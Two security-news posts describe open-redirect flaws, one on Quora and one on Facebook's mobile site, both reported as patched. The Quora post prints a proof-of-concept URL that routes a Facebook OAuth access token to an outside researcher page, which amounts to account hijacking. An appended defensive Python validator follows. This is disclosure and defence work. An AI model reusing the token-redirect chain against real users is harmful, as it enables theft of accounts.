
Researcher found a way to Hack Facebook accounts with the help of Quora


Indian security researcher Prakhar Prasad has found a way to hack Facebook accounts by exploiting an open redirection flaw in Quora, one of the most popular question-and-answer websites.

Quora allows users to sign up with a Facebook account. While signing up for Quora, the researcher noticed that quora.com was permitted to receive an access token from Facebook OAuth.

Prasad managed to steal the access token from the Quora website by exploiting an open-redirect security flaw on quora.com.

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

"Facebook OAuth authorization URL requests token permission from the user, but as the user will have the Quora app installed, it will redirect to the value specified in the next parameter of the OAuth authorization URL with a valid access_token," the researcher said in his blog.

In this case, the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora". So the request redirects the user to that URL along with the access token, and the open-redirect flaw in the goto parameter then forwards the user on to Prasad's page. The page created by Prasad captures the access token and sends the user back to facebook.com.

Unwitting users who follow the POC link soon find themselves victims of a Facebook account hack.

Complete technical details can be found in his personal blog.

You can also check out the video demo here:


Quora patched the security flaw a few days after Prasad reported the bug.

Open Redirection Vulnerability in Facebook Mobile website

Prakhar Prasad, a web application security researcher, has discovered an open redirection vulnerability in the Facebook mobile website (m.facebook.com).

An open redirect is a flaw in which an application takes a parameter and redirects the user to the parameter's value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.

Usually, when you try to visit an external link on Facebook, the URL is passed to the "l.php" page, which displays a "Leaving Facebook" message before redirecting. So if the link is malicious, the page shows a warning message first.

But Prasad discovered that one page on Facebook mobile redirects the user directly to the external link.

POC:
http://m.facebook.com/video_redirect/?src=http://www.google.com

He found this vulnerability when he tried to view an uploaded video on the Facebook mobile website.

The researcher immediately notified Facebook about the vulnerability. Facebook fixed the vulnerability and rewarded the researcher with $500.
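As an added example (not code from either post, nor from Quora or Facebook), here is the defender-side check that both flaws lacked: a validator for a redirect parameter such as Quora's goto or m.facebook.com's src that accepts only same-site destinations and otherwise routes the user through an interstitial like the l.php "Leaving Facebook" page described above. The host allowlists, the bypass variants and the interstitial's behaviour are assumptions made for this example.

```python
from urllib.parse import urlsplit, quote

def is_safe_redirect(target, allowed_hosts):
    """Return True only if `target` stays on an allowed host over http(s).

    Rejects the usual open-redirect bypasses: other hosts, protocol-relative
    URLs (//evil.example), "http:evil.example", javascript:/data: schemes,
    backslash tricks browsers fold into slashes, and userinfo tricks.
    """
    if not target:
        return False
    # Browsers treat "\" as "/", so normalise before parsing; otherwise
    # "/\evil.example" parses as a harmless relative path but leaves the site.
    candidate = target.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):
            return False
        # hostname is None for "http:evil.example" and is the part after "@"
        # for userinfo tricks, so both are rejected here.
        return "@" not in parts.netloc and parts.hostname in allowed_hosts
    if candidate.startswith("//"):
        return False  # protocol-relative URL would leave the site
    # Only a plain same-site path (e.g. "/contacts/skip") is accepted.
    return candidate.startswith("/")

def resolve_redirect(target, allowed_hosts, interstitial="/l.php"):
    """Decide where a redirect parameter should actually send the browser.

    Same-site targets are followed directly; anything else goes to an
    interstitial "leaving the site" page (the l.php pattern the post
    describes) that shows the destination instead of redirecting silently.
    """
    if is_safe_redirect(target, allowed_hosts):
        return target
    return f"{interstitial}?u={quote(target, safe='')}"

if __name__ == "__main__":
    # Constructed inputs: the two PoC parameter values from the posts plus
    # some bypass variants, each checked against the host owning the endpoint.
    cases = [
        ({"www.quora.com"}, "http://poc.prakharprasad.com/quora"),  # Quora goto=
        ({"m.facebook.com"}, "http://www.google.com"),             # m.facebook src=
        ({"www.quora.com"}, "//poc.prakharprasad.com/quora"),
        ({"www.quora.com"}, "https://www.quora.com@poc.prakharprasad.com/"),
        ({"www.quora.com"}, "/contacts/skip"),
    ]
    for hosts, value in cases:
        print(f"{value!r:55} -> {resolve_redirect(value, hosts)}")
```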